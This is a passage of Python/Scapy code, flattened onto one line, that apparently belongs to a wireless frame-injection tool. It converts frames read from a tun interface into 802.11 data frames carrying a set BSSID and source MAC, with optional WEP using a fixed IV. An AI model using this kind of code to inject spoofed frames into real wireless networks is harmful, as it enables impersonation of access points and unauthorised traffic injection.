# frame from /dev/net/tun if f in r: # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4 buf = os.read(f,1526) eth_rcvd_frame=Ether(buf[4:]) if DEBUG: os.write(1,"Received from %s\n" % ifname) if VERB: os.write(1,"%s\n" % eth_rcvd_frame.summary()) # Prepare Dot11 frame for injection dot11_sent_frame = RadioTap()/Dot11( type = "Data", FCfield = "from-DS", addr1 = eth_rcvd_frame.getlayer(Ether).dst, addr2 = BSSID) # It doesn't seem possible to set tuntap interface MAC address # when we create it, so we set source MAC here if not HAS_SMAC: dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src else: dot11_sent_frame.addr3 = SMAC if WEP: dot11_sent_frame.FCfield |= 0x40 dot11_sent_frame /= Dot11WEP( iv = "111", keyid = KEYID) dot11_sent_frame /= LLC(ctrl = 3)/SNAP(code=eth_rcvd_frame.getlayer(Ether).type)/eth_rcvd_frame.getlayer(Ether).payload